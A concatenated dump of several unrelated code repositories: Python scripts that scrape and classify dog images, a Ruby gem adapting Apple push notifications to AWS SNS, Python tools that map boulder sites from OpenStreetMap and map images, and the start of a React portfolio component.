out.write(str(precision_ens) +"\n")
out.close()
main()<file_sep>from selenium import webdriver
from bs4 import BeautifulSoup as bs
import time
import re
from urllib.request import urlopen
import json
from pandas.io.json import json_normalize
import pandas as pd, numpy as np
#hashtag='dogpooping'
#hashtag='poopingdogs'
hashtag='dogsgoingpoop'
browser = webdriver.Chrome('C:/Users/kobys/Desktop/chromedriver')
browser.get('https://www.instagram.com/explore/tags/'+hashtag)
Pagelength = browser.execute_script("window.scrollTo(0, document.body.scrollHeight);")
links=[]
source = browser.page_source
data=bs(source, 'html.parser')
body = data.find('body')
script = body.find('span')
for link in script.findAll('a'):
if re.match("/p", link.get('href')):
links.append('https://www.instagram.com'+link.get('href'))
result=pd.DataFrame()
for i in range(len(links)):
try:
page = urlopen(links[i]).read()
data=bs(page, 'html.parser')
body = data.find('body')
script = body.find('script')
raw = script.text.strip().replace('window._sharedData =', '').replace(';', '')
json_data=json.loads(raw)
posts =json_data['entry_data']['PostPage'][0]['graphql']
posts= json.dumps(posts)
posts = json.loads(posts)
x = pd.DataFrame.from_dict(json_normalize(posts), orient='columns')
x.columns = x.columns.str.replace("shortcode_media.", "")
result=result.append(x)
except:
np.nan
# Just check for the duplicates
result = result.drop_duplicates(subset = 'shortcode')
result.index = range(len(result.index))
import os
import requests
result.index = range(len(result.index))
directory="C:/Users/kobys/Desktop/Images/"
for i in range(len(result)):
r = requests.get(result['display_url'][i])
with open(directory+result['shortcode'][i]+".jpg", 'wb') as f:
f.write(r.content)
<file_sep>import os
import label_image as li
def main():
models = ["Resnet","Inception","Mobilenet", "Nasnet", "Pnasnet"]
res = [224,299,224,331,331]
#Inception (299*299)
#Mobilenet (224*224)
#Nasnet (331*331)
#Pnasnet (331*331)
#Resnet (224*224)
mydir = "G:/My Drive/Analytic Apps/DApps_Project/Test_Images/"
for j in range(len(models)):
preds = []
acts = []
print(models[j])
for dirs, subdirs, files in os.walk(mydir):
for f in files:
# Create actual classes
if 'dnp' in f:
acts.append('dog not pooping')
else:
acts.append('dog pooping')
# Build path to test image, model graph, and model label
if f == "desktop.ini":
continue
image = dirs + f
graph = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +models[j] +"/2/output_graph.pb"
labels = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +models[j] +"/2/output_labels.txt"
print(image)
#print(graph)
#print(labels)
# Get the predicted classes
preds.append(li.label_image(graph=graph, labels=labels, image=image, height=res[j], width=res[j]))
#print(preds)
#print(acts)
# Build the confusion matrix
cf = [ #Actual
[0,0], #Predicted - DP
[0,0] # - DNP
]
correct = 0
total = len(preds)
for i in range( len(preds) ):
if preds[i] == 'dog pooping' and acts[i] == 'dog pooping':
cf[0][0] += 1
elif preds[i] == 'dog pooping' and acts[i] == 'dog not pooping':
cf[0][1] += 1
elif preds[i] == 'dog not pooping' and acts[i] == 'dog pooping':
cf[1][0] += 1
elif preds[i] == 'dog not pooping' and acts[i] == 'dog not pooping':
cf[1][1] += 1
print(cf)
print()
# Calculate the metrics for the model
accuracy = (cf[0][0] + cf[1][1]) / total
recall = cf[0][0] / (cf[0][0] + cf[1][0])
precision = cf[0][0] / (cf[0][0] + cf[0][1])
print('Accuracy:', accuracy)
print('Recall:', recall)
print('Precision:', precision)
# Write out results to a text file
out = open("G:/My Drive/Analytic Apps/DApps_Project/Results/" +models[j] +'3', "w")
out.write(models[j] +" Results\n")
out.write("Confusion Matrix\n")
out.write(str(cf[0][0]) +" " +str(cf[0][1]) +"\n")
out.write(str(cf[1][0]) +" " +str(cf[1][1]) +"\n")
out.write("Accuracy\n")
out.write(str(accuracy) +"\n")
out.write("Recall\n")
out.write(str(recall) +"\n")
out.write("Precision\n")
out.write(str(precision) +"\n")
out.close()
main()<file_sep>from google_images_download import google_images_download
def downloadImages(response, query, o_path, c_path):
'''
# keywords is the search query
# format is the image file format
# limit is the number of images to be downloaded - default is 100
# print urls is to print the image file url
# size is the image size which can be specified manually ("large, medium, icon")
# aspect_ratio denotes the height width ratio of images to download. ("tall, square, wide, panoramic")
# output_directory specifies the directory to save the images to
# chromedirver specifies the path of the chromedriver, which is needed to download more than 100 photos at once
'''
arguments = {"keywords": query,
"format": "jpg",
"limit":200,
"print_urls":False,
"size": "medium",
"aspect_ratio": "panoramic",
"output_directory": o_path,
"chromedriver": c_path}
try:
response.download(arguments)
# Handling File NotFound Error
except FileNotFoundError:
print('Error, no search results found')
def main():
# Creating an object
response = google_images_download.googleimagesdownload()
# Search queries
search_queries = ['dog outside']
# File output path
o_path = 'G:/My Drive/Analytic Apps/DApps_Project/Images_Staging/'
# Chrome driver path
c_path = 'C:/Users/kobys/Desktop/chromedriver.exe'
for query in search_queries:
downloadImages(response, query, o_path, c_path)
print()
main()
<file_sep># d = {'a': [1,4,6],'b':[2,8,4]}
# best_mods = []
# for k, v in d.items():
# print(v)
# print(max(v))
# print(v.index(max(v)))
# mod = k + str(v.index(max(v))+2) # get index of best model and add two to get the number of the model
# best_mods.append(mod)
# print(best_mods)
# d = {}
# d["Resnet2"] = {}
# d["Resnet2"]["dnp0.jpg"] = "dog pooping"
# d["Resnet2"]["dnp1.jpg"] = "dog not pooping"
# d["Resnet2"]["dp0.jpg"] = "dog pooping"
# d["Resnet2"]["dp1.jpg"] = "dog pooping"
# print(d)
import json
with open("actuals.json", "r") as read_file:
data = json.load(read_file)
data = data[0]
print(data)<file_sep>import os
#mydir = 'C:/Users/kobys/Desktop/DApps_Model/Images/dog_pooping'
#mydir = 'C:/Users/kobys/Desktop/DApps_Model/Images/dog_not_pooping'
mydir = 'G:/My Drive/Analytic Apps/DApps_Project/Images_Staging'
for dirs, subdirs, files in os.walk(mydir):
counter = 0
for f in files:
os.rename(os.path.join(mydir,f), os.path.join(mydir,'dnp'+str(counter)+'.jpg'))
counter += 1
|
ee760ae0c006519d0e476f796f45acb73a9fabb6
|
[
"Markdown",
"Python"
] | 8
|
Python
|
ksok44/Dog_Pooping_Recognition
|
cbc749cc2471ddb4ca973ad7d39af7ab9d824a1f
|
5e31061432451b47092a8af805170ada081ca9c7
|
refs/heads/master
|
<repo_name>moromi/moromi-apns-aws_sns_adapter<file_sep>/lib/moromi/apns/aws_sns_adapter/apns_extension.rb
class Moromi::Apns::Message::Base
include Moromi::Aws::Sns::Message::Base
def to_parameter
Moromi::Aws::Sns::Message::Parameter.new(apns: to_hash)
end
end
class Moromi::Apns::Environment::Base
def aws_sns_application_arn
@aws_sns_application_arn ||= Moromi::Apns::AwsSnsAdapter.config.aws_sns_application_arns[key]
end
end
<file_sep>/lib/moromi/apns/aws_sns_adapter.rb
require 'moromi/apns/aws_sns_adapter/version'
require 'moromi/apns/aws_sns_adapter/config'
require 'moromi/apns/aws_sns_adapter/apns_extension'
module Moromi
module Apns
module AwsSnsAdapter
def self.configure(&block)
yield @config ||= Config.new
end
def self.config
@config
end
end
end
end
<file_sep>/README.md
# Moromi::Apns::AwsSnsAdapter
[](http://rubygems.org/gems/moromi-apns-aws_sns_adapter)
extension for moromi-apns and moromi-aws-sns
## Installation
Add this line to your application's Gemfile:
```ruby
gem 'moromi-apns-aws_sns_adapter'
```
And then execute:
$ bundle
Or install it yourself as:
$ gem install moromi-apns-aws_sns_adapter
## Usage
- config/initializers/moromi/apns.rb
```ruby
Moromi::Apns.configure do |config|
config.identifiers = {
production: 'com.example.moromi.apns.production',
in_house: 'com.example.moromi.apns.inhouse',
debug: 'com.example.moromi.apns.debug'
}
end
Moromi::Apns::AwsSnsAdapter.configure do |config|
config.aws_sns_application_arns = {
production: 'arn:aws:sns:ap-northeast-1:000000000000:app/APNS/moromi-apns-production',
in_house: 'arn:aws:sns:ap-northeast-1:000000000000:app/APNS/moromi-apns-in_house',
debug: 'arn:aws:sns:ap-northeast-1:000000000000:app/APNS_SANDBOX/moromi-apns-debug'
}
end
```
- config/initializers/moromi/aws_sns.rb
```ruby
module Moromi
module Aws
module Sns
class Client
# @param [Moromi::Apns::Environment::Base]
def self.create(environment)
new(ENV['AWS_ACCESS_KEY'], ENV['AWS_SECRET_ACCESS_KEY'], ENV['AWS_REGION'], environment.aws_sns_application_arn)
end
end
end
end
end
```
### Register device
```ruby
environment = Moromi::Apns.environment('com.example.moromi.apns.production')
arn = Moromi::Aws::Sns::Client.create(environment).register(token: token)
# store arn
```
### Send APNS
```ruby
environment = Moromi::Apns.environment('com.example.moromi.apns.production')
message = Moromi::Apns::Message::Announce.make(message: 'Message')
client = Moromi::Aws::Sns::Client.create(environment)
client.send_apns_message(arn: arn, message: message, sandbox: environment.sandbox?)
```
- use ActiveJob
```ruby
class AmazonSnsJob < ApplicationJob
queue_as :amazon_sns
def perform(hash)
params = hash.with_indifferent_access
bundle_identifier = params[:bundle_identifier]
arn = params[:arn]
message = Moromi::Apns::Message::Builder.build(params[:data])
raise unless message.is_a? Moromi::Apns::Message::Base
environment = Moromi::Apns.environment(bundle_identifier)
client = Moromi::Aws::Sns::Client.create(environment)
client.send_apns_message(arn: arn, message: message, sandbox: environment.sandbox?)
rescue Moromi::Apns::Environment::InvalidEnvironment => e
Rails.logger.error e.message
rescue Aws::SNS::Errors::EndpointDisabled => e
Rails.logger.info e.message
end
# @param [Moromi::Apns::Message::Base] message
# @param [String] bundle_identifier
# @param [String] arn
def self.enqueue_job(bundle_identifier, arn, message)
params = {
bundle_identifier: bundle_identifier,
arn: arn,
data: message.serialize
}
perform_later(params)
end
end
```
## Development
After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
## Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/moromi/moromi-apns-aws_sns_adapter.
<file_sep>/lib/moromi/apns/aws_sns_adapter/config.rb
require 'active_support/configurable'
module Moromi
module Apns
module AwsSnsAdapter
class Config
include ActiveSupport::Configurable
config_accessor :aws_sns_application_arns
config_accessor :application_arn_builder_class
end
end
end
end
<file_sep>/lib/moromi/apns/aws_sns_adapter/version.rb
module Moromi
module Apns
module AwsSnsAdapter
VERSION = '0.4.0'
end
end
end
|
bb1189d249bb7d53f316c8f5a99a75ab6c41c04f
|
[
"Markdown",
"Ruby"
] | 5
|
Ruby
|
moromi/moromi-apns-aws_sns_adapter
|
4f6c3deee511bcd06d5a6691df71216598ba7e1b
|
abbf4c3c395a08b62fde81e509d7dd1a991f3bca
|
HEAD
|
<repo_name>bben86/tictactoe<file_sep>/src/js/view/tictactoe-component.jsx
import { connect } from 'react-redux';
import React, { Component } from 'react';
import 'babel/polyfill';
import { Row, Column } from 'js/core/common';
import { start, mark } from 'js/core/actions';
import StartComponent from 'js/view/start-component';
import PlayComponent from 'js/view/play-component';
import WinnerComponent from 'js/view/winner-component';
import DrawComponent from 'js/view/draw-component';
class TicTacToeComponent extends Component {
render() {
const { dispatch, isDraw, winner, play } = this.props;
const dispatchStart = () => dispatch(start());
if (!play) return (<StartComponent onStart={dispatchStart} />);
if (winner) return (<WinnerComponent onPlay={dispatchStart} winner={winner} />);
if (isDraw) return (<DrawComponent onPlay={dispatchStart} />);
const dispatchMark = (row, column) => dispatch(mark(row, column));
return (<PlayComponent onSelect={dispatchMark} marks={play.marks} />);
}
};
const isRow = row => mark => mark.row === row;
function findColumn(marks, column) {
const result = marks.find(mark => mark.column === column);
return result ? result.player : undefined;
}
function rowMarks(marks, row) {
const filteredMarks = marks.filter(isRow(row));
return {
left: findColumn(filteredMarks, Column.Left),
center: findColumn(filteredMarks, Column.Center),
right: findColumn(filteredMarks, Column.Right)
};
}
function playMarks(marks) {
return {
topRowMarks: rowMarks(marks, Row.Top),
middleRowMarks: rowMarks(marks, Row.Middle),
bottomRowMarks: rowMarks(marks, Row.Bottom),
};
}
function select(state) {
if (!state) return { };
return {
winner: state.winner,
isDraw: state.marks.length === 9 && !state.winner,
play: {
marks: playMarks(state.marks)
}
};
}
export default connect(select)(TicTacToeComponent);
<file_sep>/src/js/core/reduce.js
import { Player, ActionTypes, Column, Row } from './common';
const initialState = { marks: [], currentPlayer: Player.X, winner: undefined };
const players = [ Player.X, Player.O ];
const columns = [ Column.Left, Column.Center, Column.Right ];
const rows = [ Row.Top, Row.Middle, Row.Bottom ];
function rowsFrom(column) {
return rows.map(row => { return { row, column }; });
}
function columnsFrom(row) {
return columns.map(column => { return { row, column }; });
};
function* zip(array1, array2) {
const length = Math.min(array1.length, array2.length);
for (var i = 0; i < length; ++i) {
yield [ array1[i], array2[i] ];
}
}
const diagonals = [
[...zip(rows, columns)].map(([row, column]) => { return { row, column }; }),
[...zip(rows, columns.reverse())].map(([row, column]) => { return { row, column }; })
];
const winnerPaths = [
...columns.map(rowsFrom),
...rows.map(columnsFrom),
...diagonals
];
function firstOrUndefined(values) {
return values.length > 0
? values[0]
: undefined;
}
const playerAt = marks => location => {
var markArray =
marks
.filter(({row, column}) => row === location.row && column === location.column)
.map(({player}) => player);
return firstOrUndefined(markArray);
}
const playersOn = marks => path => {
return path
.map(playerAt(marks))
.filter(player => player !== undefined);
}
const ownsAll = player => pathPlayers => {
return pathPlayers.length === 3 &&
pathPlayers.every(p => p === player);
}
const isWinner = marks => player => {
return winnerPaths
.map(playersOn(marks))
.some(ownsAll(player));
}
function winnerOf(marks) {
const winnerArray = players.filter(isWinner(marks));
return firstOrUndefined(winnerArray);
}
function addMark(player, marks, row, column) {
return [...marks, { player, row, column }];
}
function otherPlayer(player) {
return player === Player.X
? Player.O
: Player.X;
}
function mark(state, {row, column}) {
const marks = addMark(state.currentPlayer, state.marks, row, column);
return {
...state,
marks,
currentPlayer: otherPlayer(state.currentPlayer),
winner: winnerOf(marks)
};
}
export default function (state = null, action) {
switch (action.type) {
case ActionTypes.Start: return initialState;
case ActionTypes.Mark: return mark(state, action.payload);
}
}
<file_sep>/src/js/view/index.jsx
import { createStore, applyMiddleware } from 'redux';
import React from 'react';
import { render } from 'react-dom';
import { Provider } from 'react-redux';
import thunkMiddleware from 'js/core/thunk-middleware';
import reduce from 'js/core/reduce';
import TicTacToeComponent from 'js/view/tictactoe-component';
const store = applyMiddleware(thunkMiddleware('error'))(createStore)(reduce);
const rootElement = document.getElementById('root');
render(
<Provider store={store}>
<TicTacToeComponent />
</Provider>,
rootElement
)
<file_sep>/src/js/view/draw-component.jsx
import React, { Component } from 'react';
export default class DrawComponent extends Component {
render() {
const { onPlay } = this.props;
return (
<div className="draw">
<p>Draw!</p>
<button onClick={onPlay}>Play Again</button>
</div>
);
}
};
<file_sep>/test/test-startup.js
var path = require('path');
var jsPath = path.join(__dirname, '../src/js');
require('app-module-path').addPath(jsPath);
<file_sep>/src/js/view/start-component.jsx
import React, { Component } from 'react';
export default class StartComponent extends Component {
render() {
const { onStart } = this.props;
return (
<div className="start">
<button onClick={onStart}>Start</button>
</div>
);
}
};
<file_sep>/src/js/core/common.js
export const Player = { X: 'X', O: 'O' };
export const ActionTypes = {
Start: 'start',
Mark: 'mark'
};
export const Column = {
Left: 'left',
Center: 'center',
Right: 'right'
};
export const Row = {
Top: 'top',
Middle: 'middle',
Bottom: 'bottom'
};
<file_sep>/src/js/view/play-component.jsx
import React, { Component } from 'react';
import { Row } from 'js/core/common';
import RowComponent from 'js/view/row-component';
export default class PlayComponent extends Component {
render() {
const { onSelect, marks } = this.props;
const onRowSelect = row => column => onSelect(row, column);
return (
<div className="play">
<RowComponent onSelect={onRowSelect(Row.Top)}
leftMark={marks.topRowMarks.left}
centerMark={marks.topRowMarks.center}
rightMark={marks.topRowMarks.right} />
<RowComponent onSelect={onRowSelect(Row.Middle)}
leftMark={marks.middleRowMarks.left}
centerMark={marks.middleRowMarks.center}
rightMark={marks.middleRowMarks.right} />
<RowComponent onSelect={onRowSelect(Row.Bottom)}
leftMark={marks.bottomRowMarks.left}
centerMark={marks.bottomRowMarks.center}
rightMark={marks.bottomRowMarks.right} />
</div>
);
}
};
|
bf336f8420516dbbff2ae0a0205be697f6408259
|
[
"JavaScript"
] | 8
|
JavaScript
|
bben86/tictactoe
|
03e265f7e492d5bc60c8d0b375f193c2210551db
|
ef154b84018662564c2352a37dfbdeb6ffbbe9a0
|
refs/heads/master
|
<repo_name>rajesh002/lab-jdbc-connection<file_sep>/src/controller/Main.java
package controller;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Properties;
import utility.ConnectionManager;
public class Main {
public static void main(String args[]) throws Exception {
ConnectionManager cm=new ConnectionManager();
Connection con=cm.getConnection();
if(con!=null)
System.out.println("Connection Established");
else
System.out.println("Check your Connection");
}
}
|
e5ce987aeee2ebc54082bab3a586c73a4c90d3cd
|
[
"Java"
] | 1
|
Java
|
rajesh002/lab-jdbc-connection
|
82a4fa56d0e072b1b8167e5e4c897b71490ffcdf
|
b20df6406b24c0dae2a0d576f276a0e8090c0d0b
|
refs/heads/master
|
<repo_name>qq919006380/musicPlayer<file_sep>/README.md
# musicPlayer
# API
## 属性
```
var audioObject = new Audio('http://xxx.com/xx.mp3')
```
- audioObject.play()开始播放
- audioObject.pause()暂停播放
- audioObject.autoPlay 设置或者获取自动播放状态
- audioObject.src 设置或者获取音乐地址
- audioObject.volume 设置或者获取音量,最大值为1,0为静音
- audioObject.loop 设置或者获取循环状态
- audioObject.duration 获取音乐长度,单位为秒
- audioObject.currentTime 设置或者获取播放时间
- audioObject.ended 判断音乐是否播放完毕,只读属性
## 事件
- playing 当音乐开始播放,暂停后重新开始播放,设置currentTime后开始播放时触发
- pause 当音乐暂停时和结束时触发
- ended 当音乐结束时触发
- timeupdate 当currentTime更新时会触发timeupdate事件,这个事件的触发频率由系统决定
- volumechange 当音量改变时触发
## 使用ajax获取数据
```
function getmusic(callback) {
var xhr = new XMLHttpRequest()
xhr.open("GET", "music.json", true)
xhr.onload = function() {
callback(JSON.parse(this.responseText)) //调用一个callback()处理响应回来的内容
//...
}
xhr.send()
}
```
<file_sep>/js/index.js
var musicList=[]
var currentIndex=0
var audio=new Audio()
audio.autoplay=true
getmusic(function(list){
musicList=list
loadMusic(list[currentIndex])
})
audio.ontimeupdate=function(){
$('.musicbox .progress-now').style.width=(this.currentTime/this.duration)*100+'%'
}
audio.onplay=function(){
clock=setInterval(function(){
var min=Math.floor(audio.currentTime/60)
var sec=Math.floor(audio.currentTime%60)+''
sec=sec.length==2?sec:'0'+sec
$('.musicbox .time').innerText=min+':'+sec
},1000)
}
audio.onended=function(){
console.log('end')
currentIndex=(++currentIndex)%musicList.length
loadMusic(musicList[currentIndex])
}
audio.onpause=function(){
clearInterval(clock)
}
$('.musicbox .play').onclick=function(){
playSwitch()
}
$('.musicbox .forward').onclick=function(){
currentIndex = (++currentIndex)%musicList.length
console.log(currentIndex)
loadMusic(musicList[currentIndex])
playSwitch()
}
$('.musicbox .back').onclick=function(){
currentIndex=(musicList.length+(--currentIndex))%musicList.length
console.log(currentIndex)
loadMusic(musicList[currentIndex])
playSwitch()
}
$('.musicbox .bar').onclick=function(e){
var barWidth=e.offsetX/parseInt(getComputedStyle(this).width)
console.log(barWidth)
audio.currentTime=audio.duration*barWidth
}
function $(selector){
return document.querySelector(selector)
}
function playSwitch(){
if(audio.paused){//播放中为false
$('.musicbox .play').querySelector('.fa').classList.remove('fa-play')
$('.musicbox .play').querySelector('.fa').classList.add('fa-pause')
audio.play()
}else{
$('.musicbox .play').querySelector('.fa').classList.remove('fa-pause')
$('.musicbox .play').querySelector('.fa').classList.add('fa-play')
audio.pause()
}
}
function getmusic(callback) {
var xhr = new XMLHttpRequest()
xhr.open("GET", "music.json", true)
xhr.onload = function() {
if((xhr.status >= 200 && xhr.status < 300) || xhr.status === 304) {
callback(JSON.parse(this.responseText))
} else {
document.write("<h1 style='text-align:center'>获取数据失败</h1>")
}
}
xhr.onerror = function() {
console.log('网络异常')
}
xhr.send()
}
function loadMusic(musicObj){
$('.info .title').innerText=musicObj.title
$('.info .auther').innerText=musicObj.auther
$('.cover').style.backgroundImage='url('+musicObj.img+')'
audio.src=musicObj.src
}
|
7bf2ff22e96ade031889668eeb6600652ac42e65
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
qq919006380/musicPlayer
|
ba38a4cec70cb711a97eb0357385d6aaea66e6b6
|
af67d9d33e7081eacc5070721ea02833e32a75f4
|
refs/heads/master
|
<file_sep>appdirs==1.4.4
argon2-cffi==20.1.0
astroid==2.4.2
async-generator==1.10
attrs==20.3.0
backcall==0.2.0
beautifulsoup4==4.9.3
black==20.8b1
bleach==3.3.0
cffi==1.14.5
click==7.1.2
cycler==0.10.0
decorator==4.4.2
defusedxml==0.6.0
entrypoints==0.3
geojson==2.5.0
imageio==2.9.0
importlib-metadata==3.4.0
iniconfig==1.1.1
ipykernel==5.4.3
ipython==7.20.0
ipython-genutils==0.2.0
ipywidgets==7.6.3
isort==5.7.0
jedi==0.18.0
Jinja2==2.11.3
joblib==1.0.1
jsonschema==3.2.0
jupyter==1.0.0
jupyter-client==6.1.11
jupyter-console==6.2.0
jupyter-core==4.7.1
jupyterlab-pygments==0.1.2
jupyterlab-widgets==1.0.0
kiwisolver==1.3.1
lazy-object-proxy==1.4.3
lxml==4.6.2
MarkupSafe==1.1.1
matplotlib==3.3.4
mccabe==0.6.1
mistune==0.8.4
mypy-extensions==0.4.3
nbclient==0.5.2
nbconvert==6.0.7
nbformat==5.1.2
nest-asyncio==1.5.1
networkx==2.5
notebook==6.2.0
numpy==1.20.1
opencv-python==4.5.1.48
OSMPythonTools==0.2.9
packaging==20.9
pandas==1.2.2
pandocfilters==1.4.3
parso==0.8.1
pathspec==0.8.1
pexpect==4.8.0
pickleshare==0.7.5
Pillow==8.1.0
pkg-resources==0.0.0
pluggy==0.13.1
prometheus-client==0.9.0
prompt-toolkit==3.0.16
ptyprocess==0.7.0
py==1.10.0
pycparser==2.20
Pygments==2.7.4
pylint==2.6.0
pyparsing==2.4.7
pyrsistent==0.17.3
pytest==6.2.2
pytest-sugar==0.9.4
python-dateutil==2.8.1
pytz==2021.1
PyWavelets==1.1.1
pyzmq==22.0.2
qtconsole==5.0.2
QtPy==1.9.0
regex==2020.11.13
scikit-image==0.18.1
scikit-learn==0.24.1
scipy==1.6.0
Send2Trash==1.5.0
six==1.15.0
soupsieve==2.2
termcolor==1.1.0
terminado==0.9.2
testpath==0.4.4
threadpoolctl==2.1.0
tifffile==2021.2.1
toml==0.10.2
tornado==6.1
traitlets==5.0.5
typed-ast==1.4.2
typing-extensions==3.7.4.3
ujson==4.0.2
wcwidth==0.2.5
webencodings==0.5.1
widgetsnbextension==3.5.1
wrapt==1.12.1
xarray==0.16.2
zipp==3.4.0
<file_sep>import numpy as np
from matplotlib import image as mpimg
from matplotlib import pyplot as plt
from OSMPythonTools.api import Api
api = Api()
# load transform matrix
geo2ind = np.load("data/geo2ind.npy")
# load piste d'Argenton
way_ids = [111415872, 235094917, 526991326, 235094922, 235094924, 235094919]
track_lat = []
track_lon = []
for way_id in way_ids:
way = api.query("way/" + str(way_id))
for node in way.nodes():
track_lat.append(node.lat())
track_lon.append(node.lon())
# get track as image indices
track_col, track_row = geo2ind @ np.stack(
(track_lat, track_lon, np.ones_like(track_lat))
)
# load image
general_map = mpimg.imread("img/plan_general.jpg")
# overlay OSM track over map image
plt.imshow(np.mean(general_map, axis=2), cmap="gray")
plt.plot(track_col, track_row, c="#ff7900cd")
plt.axis("off")
plt.savefig("visual_check.png", dpi=300, bbox_inches="tight")
<file_sep># annot-boulder-geodata
Retrieve geodata from [ABloc.org](http://abloc.org) and integrate it into [OpenStreetMap](https://www.openstreetmap.org) database
- Primary goal: Add the 37 boulder sites as nodes or areas with their names
- Secondary goal: Add additional tags such as grades https://wiki.openstreetmap.org/wiki/Climbing
## To do:
- [x] download sites map images
- [x] get POI from OSM and map images
- [x] get accurate pixel indices to geographic coordinates transform
- [x] detect boulder site blobs (in green)
- [x] quantize image colors (sites in green, roads in black, etc.)
- [x] separate blobs
- [ ] registrer sub images (e.g. "zone de la 4ème à la 7ème épingle") to general map
- [x] name bouder sites
- [ ] add to OSM
OSM track over map image:

Example of detected boulder sites:

## Licence
From [ABloc.org](http://ablog.org)
> Droits d'auteur: toute reproduction du topo est vivement encouragée par quelque moyen que ce soit (papier ou numérique) à l'exclusion d'une quelconque activité commerciale.
> *Copyrights: any reproduction of the topo is strongly encouraged by any means whatsoever (paper or digital) to the exclusion of any commercial activity.*
<file_sep>import numpy as np
import pandas as pd
import glob
from matplotlib import image as mpimg
from skimage import morphology, measure
n_bit = 2 ** 8 - 1
n_image = 8
# Morphogy operations parameters
area_threshold = 256 # arbitrary large enough
opening_radius = 9
erosion_radius = 3
colors = np.load("data/colors.npy")
submaps = glob.glob("img/i*.jpg")
submaps.sort()
submaps.insert(0, "img/plan_general.jpg") # add general map
image_index = []
image_name = []
blob_index = []
centroid = []
for img_ind in range(1, n_image + 1):
img = mpimg.imread(f"data/{img_ind}_4_colors.png")
green = (img[:, :, 1] * n_bit).astype(int) # green channel
bw = green == colors[1, 1] # second label from color_quantization.py
# Morphological cleaning
bw = morphology.remove_small_holes(bw, area_threshold)
bw = morphology.remove_small_objects(bw, area_threshold)
bw = morphology.opening(bw, selem=morphology.disk(opening_radius))
# Erosion step to disconnect close blobs
bw = morphology.erosion(bw, selem=morphology.disk(erosion_radius))
# Get blobs centroids
label = measure.label(bw, connectivity=1)
regions = measure.regionprops(label)
for b_ind, region in enumerate(regions):
image_index.append(img_ind)
image_name.append(submaps[img_ind])
blob_index.append(b_ind)
centroid.append(region.centroid)
centroid = np.array(centroid)
data = {
"image_index": image_index,
"image_name": image_name,
"blob_index": blob_index,
"col": centroid[:, 1],
"row": centroid[:, 0],
}
df = pd.DataFrame(data)
df.to_csv("poi/blobs.csv")
<file_sep>import glob
import numpy as np
from matplotlib import image as mpimg
from matplotlib import colors
from sklearn.cluster import KMeans
# parameters
n_channel = 3
n_bit = 2 ** 8 - 1
n_cluster = 3 # black, green, orange
def rgb_to_flat_cyan_hsv(rgb: np.ndarray) -> np.ndarray:
hsv = colors.rgb_to_hsv(rgb / n_bit).reshape((-1, n_channel))
hsv[:, 0] = np.mod(hsv[:, 0] + 0.5, 1) # shift hue origin to cyan
return hsv
def flat_cyan_hsv_to_rgb(hsv: np.ndarray) -> np.ndarray:
hsv[:, 0] = np.mod(hsv[:, 0] - 0.5, 1) # shift hue origin back to red
rgb = colors.hsv_to_rgb(hsv.reshape(-1, 1, n_channel))
return rgb
# get colors from reference image
ref = mpimg.imread("img/i-20eme 25eme epingle.jpg")
hsv = rgb_to_flat_cyan_hsv(ref)
saturated = hsv[:, 1] > 0.5 # keep saturated colors only
kmeans = KMeans(n_clusters=n_cluster).fit(hsv[saturated, :])
centers = flat_cyan_hsv_to_rgb(kmeans.cluster_centers_).reshape(n_cluster, n_channel)
centers = np.insert(centers, 0, [1.0, 1.0, 1.0], axis=0) # add white background
centers = (centers * n_bit).astype(ref.dtype)
np.save("data/colors.npy", centers) # colors LUT
# apply color quantization
submaps = glob.glob("img/i*.jpg")
submaps.sort()
submaps.insert(0, "img/plan_general.jpg") # add general map
for ind, submap in enumerate(submaps):
img = mpimg.imread(submap)
hsv = rgb_to_flat_cyan_hsv(img)
saturated = hsv[:, 1] > 0.5
labels = np.zeros(hsv.shape[0])
labels[saturated] = kmeans.predict(hsv[saturated, :]) + 1 # predict
labels = centers[labels.reshape(img.shape[:2]).astype(int)] # apply LUT
mpimg.imsave(f"data/{ind}_4_colors.png", labels)
<file_sep>import pandas as pd
from matplotlib import image as mpimg
from matplotlib import pyplot as plt
import re
def show_blob_figures(
df: pd.DataFrame, printed: str = "blob_index", s: int = 100, dpi: int = 100
) -> None:
image_name = ""
for blob in df.itertuples():
if blob.image_name is not image_name:
if image_name:
plt.savefig(f"data/{blob.image_index - 1}_show_blob.png", dpi=dpi)
img = mpimg.imread(blob.image_name)
plt.figure()
plt.imshow(img)
image_name = blob.image_name
marker = f"{getattr(blob, printed)}"
# remove "le" and "la" words, vowels and spaces
marker = re.sub(r"^le\s|^la\s|[aâeéèêioôuy\s]", "", marker)
# keep first 4 characters as scatter plot marker
marker = f"${marker[:4]}$"
plt.scatter(blob.col, blob.row, s=s, marker=marker, c="black")
plt.savefig(f"data/{blob.image_index}_show_blob.png", dpi=dpi)
<file_sep>import numpy as np
import pandas as pd
import cv2 as cv
# load POI
osm_df = pd.read_csv("poi/osm_poi.csv")
img_df = pd.read_csv("poi/map_img_poi.csv")
# convert to arrays
lat = osm_df.lat.values
lon = osm_df.lon.values
col = img_df.col.values
row = img_df.row.values
geo = np.stack((lat, lon)).T # geographic coordinates
ind = np.stack((col, row)).T # pixel indices
# estimate affine transform matrix using RANSAC algorithm
geo2ind = cv.estimateAffine2D(cv.UMat(geo), cv.UMat(ind))[0]
ind2geo = np.linalg.inv(np.vstack((geo2ind, [0, 0, 1])))[:2] # inverse matrix
# save transform matrix
np.save("data/geo2ind.npy", geo2ind)
np.save("data/ind2geo.npy", ind2geo)
|
fdec83a398cab7e0f43432163d907a420a899dcd
|
[
"Markdown",
"Python",
"Text"
] | 7
|
Text
|
tdemarcy/annot-boulder-geodata
|
887f9b8ed55ef6f89fd5dabae1868422c37ab56b
|
d604a29f2bbc0d82a5bb57b6c26e8749dec06775
|
refs/heads/master
|
<repo_name>balex654/Portfolio<file_sep>/src/ClassComponents/CPRE288/Lab6/Lab6.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab6PNG from './lab6.png';
import lab6C from './Lab6.c';
import ProjectFiles from './lab6.zip';
const Title = Typography.Title;
export default class Lab6 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
